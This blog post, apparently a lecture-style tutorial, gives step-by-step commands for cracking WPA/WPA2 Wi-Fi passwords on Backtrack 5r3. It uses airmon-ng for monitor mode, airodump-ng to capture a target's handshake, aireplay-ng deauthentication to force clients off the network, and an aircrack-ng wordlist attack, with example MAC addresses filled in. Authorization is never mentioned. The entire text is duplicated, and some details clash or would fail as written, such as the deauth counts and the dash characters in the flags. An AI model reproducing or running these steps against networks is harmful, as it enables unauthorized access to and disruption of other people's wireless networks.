Assalam-o-Alikum to all of you!
This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file
The commands which we will need in wpa\wpa2 cracking are as under:
1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )
Process . . . .
1= * Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
![[Image: 1st_command.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLfmjON6Bp3lgohZaB-jD2Zd9uoDj085gQsQdYdhQUCBY_YAx3CVTzvEKmaTfT0_n1Ixp64A8kGaSg0HfFkAmmhXkFJho08cEYswJCti8KF2fO8Q=s0-d)
2= * Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
![[Image: 2nd_command.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uTS5XYWnWIhF9z8KUKFc6aaCPquOJ98e-B4OOSxfePLReXN4EfZ284yBbKwgnY9S6DmrSYftSuK9YnLBXLCN9TgV4p2m0mjF_H_oqph3EWcPmi=s0-d)
3= * Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
![[Image: 3rd_command.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uh6rgKfwkYzTIt4nhTbRfSDcJXnQDrWPjjT0-WqE8F0wNMSx6f7W-2qnXU5MWqex9L7J62YZ-5E6pIcp8bD4ApbTFL-MsJxFi5t78I45CN-rOwiw=s0-d)
4=* Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
![[Image: 4th_command.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9WF5Me48MKjz30nLqlhEQylBE9Zrl2jtuVJOmD4NRNHJFQhkfUeMTotD3x0xDASHi1JHBhodoPuobyyb3RryGUKo8m-SaAl99zXndvlbBfPRT6A=s0-d)
5= * Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
![[Image: 5th_command.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sHyOOVEdcKrFGDmprgSxFNYgvTEHV5FcBiU3KbN8J5EeIIYzJJ9EGx6lJjXY0Eqj6LgOVu93R9d49frbqPJzPNqcpf9v6vw4CRJ6m5vPdFAPGk=s0-d)
6= * Now type sixth command : NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown) :lol:
Hope all of you get it. If any problem ask me ( Must Reply ) & if there is any mistake you can tell me I'll correct it.
This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file
The commands which we will need in wpa\wpa2 cracking are as under:
1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )
Process . . . .
1= * Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
2= * Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
3= * Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
4=* Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
5= * Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
6= * Now type sixth command : NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown) :lol:
Hope all of you get it. If any problem ask me ( Must Reply ) & if there is any mistake you can tell me I'll correct it.
No comments:
Post a Comment